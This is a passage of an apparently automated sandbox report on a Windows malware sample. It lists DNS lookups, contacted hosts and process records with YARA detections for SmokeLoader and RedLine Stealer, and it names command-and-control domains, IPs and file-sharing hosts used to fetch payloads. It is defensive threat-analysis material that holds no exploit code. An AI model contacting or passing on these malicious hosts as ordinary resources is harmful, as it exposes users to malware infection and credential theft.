                                                                                                                                                                      Nov 19, 2022 10:38:11.164679050 CET192.168.2.38.8.8.80x18e2Standard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:14.707420111 CET192.168.2.38.8.8.80xf502Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:14.869998932 CET192.168.2.38.8.8.80xc662Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:15.042428970 CET192.168.2.38.8.8.80x79afStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:15.238451004 CET192.168.2.38.8.8.80x4cf3Standard query (0)hoteldostyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:20.819649935 CET192.168.2.38.8.8.80x17f0Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:21.034486055 CET192.168.2.38.8.8.80x3ce7Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:21.249598980 CET192.168.2.38.8.8.80x7709Standard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:22.885689974 CET192.168.2.38.8.8.80x88fcStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:23.094655037 CET192.168.2.38.8.8.80xe063Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:25.949970007 CET192.168.2.38.8.8.80x6f70Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.010088921 CET192.168.2.38.8.8.80x8425Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.258568048 CET192.168.2.38.8.8.80x5b74Standard query (0)cdn-104.anonfiles.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.536580086 CET192.168.2.38.8.8.80xe85aStandard query (0)anonfiles.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.761984110 CET192.168.2.38.8.8.80x7097Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:28.066414118 CET192.168.2.38.8.8.80x699eStandard query (0)u.toA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:28.602567911 CET192.168.2.38.8.8.80x8382Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.239953995 CET192.168.2.38.8.8.80xf8ccStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.435972929 CET192.168.2.38.8.8.80xa3aaStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.613445044 CET192.168.2.38.8.8.80x140Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.890120029 CET192.168.2.38.8.8.80x10c6Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:30.736552000 CET192.168.2.38.8.8.80x350bStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:30.898178101 CET192.168.2.38.8.8.80x4ee1Standard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.088722944 CET192.168.2.38.8.8.80xe6abStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.256349087 CET192.168.2.38.8.8.80x15a9Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.377008915 CET192.168.2.38.8.8.80xa5d6Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:32.301501989 CET192.168.2.38.8.8.80xdb7aStandard query (0)o36fafs3sn6xou.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:40.929582119 CET192.168.2.38.8.8.80xc0c4Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:04.991622925 CET192.168.2.38.8.8.80x8afcStandard query (0)svedbergbryanthusnonarithmetical.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:05.429963112 CET192.168.2.38.8.8.80x8218Standard query (0)www.youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:06.277318954 CET192.168.2.38.8.8.80x6334Standard query (0)2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhqA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:12.060153961 CET192.168.2.38.8.8.80xde8fStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:14.078975916 CET192.168.2.38.8.8.80xe667Standard query (0)lentaphoto.atA (IP address)IN (0x0001)false
                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 19, 2022 10:36:51.095769882 CET8.8.8.8192.168.2.30xeec5No error (0)windowsupdatebg.s.llnwi.net178.79.225.0A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:36:51.095769882 CET8.8.8.8192.168.2.30xeec5No error (0)windowsupdatebg.s.llnwi.net95.140.230.192A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:51.842966080 CET8.8.8.8192.168.2.30xde57No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:52.583683014 CET8.8.8.8192.168.2.30x6edNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:53.134239912 CET8.8.8.8192.168.2.30xb42cNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:53.431488991 CET8.8.8.8192.168.2.30x3f2aNo error (0)srshf.com108.167.141.212A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:54.634073973 CET8.8.8.8192.168.2.30xb96bNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:54.805392027 CET8.8.8.8192.168.2.30xb58bNo error (0)iplogger.com148.251.234.93A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:54.972848892 CET8.8.8.8192.168.2.30xadcaNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:55.133872986 CET8.8.8.8192.168.2.30xe594No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:55.295975924 CET8.8.8.8192.168.2.30x8e00No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:55.703301907 CET8.8.8.8192.168.2.30xd493No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:37:55.883002043 CET8.8.8.8192.168.2.30x20c4No error (0)1ecosolution.it46.252.148.24A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:03.435493946 CET8.8.8.8192.168.2.30x8bf5No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:03.871123075 CET8.8.8.8192.168.2.30xf694No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.030489922 CET8.8.8.8192.168.2.30xb8a2No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.214128971 CET8.8.8.8192.168.2.30x921cNo error (0)cdn-102.anonfiles.com195.96.151.51A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.422077894 CET8.8.8.8192.168.2.30xb4b4No error (0)anonfiles.com45.154.253.151A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.422077894 CET8.8.8.8192.168.2.30xb4b4No error (0)anonfiles.com45.154.253.152A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.422077894 CET8.8.8.8192.168.2.30xb4b4No error (0)anonfiles.com45.154.253.150A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.615020037 CET8.8.8.8192.168.2.30xd613No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.785401106 CET8.8.8.8192.168.2.30x3427No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:04.950486898 CET8.8.8.8192.168.2.30xf816No error (0)bitbucket.org104.192.141.1A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-w.us-east-1.amazonaws.com52.217.206.73A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-w.us-east-1.amazonaws.com3.5.16.107A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-w.us-east-1.amazonaws.com52.216.24.52A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-w.us-east-1.amazonaws.com52.217.13.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-w.us-east-1.amazonaws.com3.5.3.100A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-w.us-east-1.amazonaws.com54.231.137.17A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-w.us-east-1.amazonaws.com52.216.214.81A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:05.499828100 CET8.8.8.8192.168.2.30xdbc8No error (0)s3-w.us-east-1.amazonaws.com52.216.88.171A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:09.030143976 CET8.8.8.8192.168.2.30x5215No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:09.215954065 CET8.8.8.8192.168.2.30xf417No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:10.590337038 CET8.8.8.8192.168.2.30x1f89No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:10.773845911 CET8.8.8.8192.168.2.30x9505No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:10.987179995 CET8.8.8.8192.168.2.30x729cNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:11.184869051 CET8.8.8.8192.168.2.30x18e2No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:14.725869894 CET8.8.8.8192.168.2.30xf502No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:14.890060902 CET8.8.8.8192.168.2.30xc662No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:15.060513020 CET8.8.8.8192.168.2.30x79afNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:15.701762915 CET8.8.8.8192.168.2.30x4cf3No error (0)hoteldostyk.com43.231.112.109A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:20.839776039 CET8.8.8.8192.168.2.30x17f0No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:21.054763079 CET8.8.8.8192.168.2.30x3ce7No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:21.270658016 CET8.8.8.8192.168.2.30x7709No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:22.904759884 CET8.8.8.8192.168.2.30x88fcNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:23.112772942 CET8.8.8.8192.168.2.30xe063No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:25.967694998 CET8.8.8.8192.168.2.30x6f70No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.029911995 CET8.8.8.8192.168.2.30x8425No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.286843061 CET8.8.8.8192.168.2.30x5b74No error (0)cdn-104.anonfiles.com195.96.151.53A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.554032087 CET8.8.8.8192.168.2.30xe85aNo error (0)anonfiles.com45.154.253.151A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.554032087 CET8.8.8.8192.168.2.30xe85aNo error (0)anonfiles.com45.154.253.152A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.554032087 CET8.8.8.8192.168.2.30xe85aNo error (0)anonfiles.com45.154.253.150A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:27.779742002 CET8.8.8.8192.168.2.30x7097No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:28.087229967 CET8.8.8.8192.168.2.30x699eNo error (0)u.to195.216.243.155A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:28.625432014 CET8.8.8.8192.168.2.30x8382No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:28.625432014 CET8.8.8.8192.168.2.30x8382No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:28.625432014 CET8.8.8.8192.168.2.30x8382No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:28.625432014 CET8.8.8.8192.168.2.30x8382No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:28.625432014 CET8.8.8.8192.168.2.30x8382No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.258445978 CET8.8.8.8192.168.2.30xf8ccNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.455861092 CET8.8.8.8192.168.2.30xa3aaNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.644002914 CET8.8.8.8192.168.2.30x140No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.907610893 CET8.8.8.8192.168.2.30x10c6No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.907610893 CET8.8.8.8192.168.2.30x10c6No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.907610893 CET8.8.8.8192.168.2.30x10c6No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:29.907610893 CET8.8.8.8192.168.2.30x10c6No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:30.754844904 CET8.8.8.8192.168.2.30x350bNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:30.916239977 CET8.8.8.8192.168.2.30x4ee1No error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.107050896 CET8.8.8.8192.168.2.30xe6abNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.276186943 CET8.8.8.8192.168.2.30x15a9No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.396316051 CET8.8.8.8192.168.2.30xa5d6No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.396316051 CET8.8.8.8192.168.2.30xa5d6No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.396316051 CET8.8.8.8192.168.2.30xa5d6No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:31.396316051 CET8.8.8.8192.168.2.30xa5d6No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:32.319535017 CET8.8.8.8192.168.2.30xdb7aNo error (0)o36fafs3sn6xou.com77.232.37.228A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:38:40.947027922 CET8.8.8.8192.168.2.30xc0c4No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:05.010046005 CET8.8.8.8192.168.2.30x8afcNo error (0)svedbergbryanthusnonarithmetical.com84.21.172.142A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:05.447870016 CET8.8.8.8192.168.2.30x8218No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:05.447870016 CET8.8.8.8192.168.2.30x8218No error (0)youtube-ui.l.google.com172.217.168.14A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:05.447870016 CET8.8.8.8192.168.2.30x8218No error (0)youtube-ui.l.google.com172.217.168.46A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:05.447870016 CET8.8.8.8192.168.2.30x8218No error (0)youtube-ui.l.google.com172.217.168.78A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:05.447870016 CET8.8.8.8192.168.2.30x8218No error (0)youtube-ui.l.google.com142.250.203.110A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:05.447870016 CET8.8.8.8192.168.2.30x8218No error (0)youtube-ui.l.google.com216.58.215.238A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:06.295533895 CET8.8.8.8192.168.2.30x6334Name error (3)2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhqnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:12.079382896 CET8.8.8.8192.168.2.30xde8fNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 19, 2022 10:39:14.447832108 CET8.8.8.8192.168.2.30xe667Server failure (2)lentaphoto.atnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                      • srshf.com
                                                                                                                                                                      • iplogger.com
                                                                                                                                                                      • cdn-102.anonfiles.com
                                                                                                                                                                      • anonfiles.com
                                                                                                                                                                      • bitbucket.org
                                                                                                                                                                      • bbuseruploads.s3.amazonaws.com
                                                                                                                                                                      • transfer.sh
                                                                                                                                                                      • hoteldostyk.com
                                                                                                                                                                      • cdn-104.anonfiles.com
                                                                                                                                                                      • u.to
                                                                                                                                                                      • cdn.discordapp.com
                                                                                                                                                                      • github.com
                                                                                                                                                                      • raw.githubusercontent.com
                                                                                                                                                                      • t.me
                                                                                                                                                                      • debvplifcf.com
                                                                                                                                                                        • o36fafs3sn6xou.com
                                                                                                                                                                      • kpswfp.com
                                                                                                                                                                      • sdins.com
                                                                                                                                                                      • auypktwjk.net
                                                                                                                                                                      • ebvtwkfux.com
                                                                                                                                                                      • hqmym.org
                                                                                                                                                                      • datryh.net
                                                                                                                                                                      • ajpfnqvlq.net
                                                                                                                                                                      • sxihacbmgi.com
                                                                                                                                                                      • upkkyf.com
                                                                                                                                                                      • hgusiwjl.com
                                                                                                                                                                      • ulciihlbw.org
                                                                                                                                                                      • bjtfrvl.com
                                                                                                                                                                      • vvydl.com
                                                                                                                                                                      • jtmdotimkr.org
                                                                                                                                                                      • 193.56.146.168
                                                                                                                                                                      • gsqxoged.net
                                                                                                                                                                      • ahgwjjm.org
                                                                                                                                                                      • efngjyqy.org
                                                                                                                                                                      • ukkwrl.org
                                                                                                                                                                      • ebaxoe.net
                                                                                                                                                                      • eqghptenl.com
                                                                                                                                                                      • ptpfdpcirh.net
                                                                                                                                                                      • etebl.net
                                                                                                                                                                      • aexqt.org
                                                                                                                                                                      • aehnv.net
                                                                                                                                                                      • 89.208.107.216
                                                                                                                                                                      • fbybhia.org
                                                                                                                                                                      • fhkewyoq.net
                                                                                                                                                                      • mqfbhqf.com
                                                                                                                                                                      • acxiqgb.org
                                                                                                                                                                      • xawdohy.net
                                                                                                                                                                      • uvlvsvw.com
                                                                                                                                                                      • jorxt.net
                                                                                                                                                                      • syohyc.net
                                                                                                                                                                      • cbmlqnw.com
                                                                                                                                                                      • 116.202.5.101
                                                                                                                                                                      • 193.56.146.174

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:10:36:56
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\Desktop\S2XJ2wbz7u.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\Desktop\S2XJ2wbz7u.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:343552 bytes
                                                                                                                                                                      MD5 hash:FFB4CF34B38F126C917E1C1E1D26DF73
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.326943587.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.327031304.0000000000891000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:10:37:05
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                      Imagebase:0x7ff69fe90000
                                                                                                                                                                      File size:3933184 bytes
                                                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Target ID:11
                                                                                                                                                                      Start time:10:37:52
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\tiddsjj
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\tiddsjj
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:343552 bytes
                                                                                                                                                                      MD5 hash:FFB4CF34B38F126C917E1C1E1D26DF73
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000B.00000002.378510967.0000000000930000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.378663629.0000000000B41000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      Target ID:12
                                                                                                                                                                      Start time:10:38:07
                                                                                                                                                                      Start date:19/11/2022
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\2B4A.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\2B4A.exe
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:300544 bytes
                                                                                                                                                                      MD5 hash:2DEE200193091BE2F2321D921750C4ED
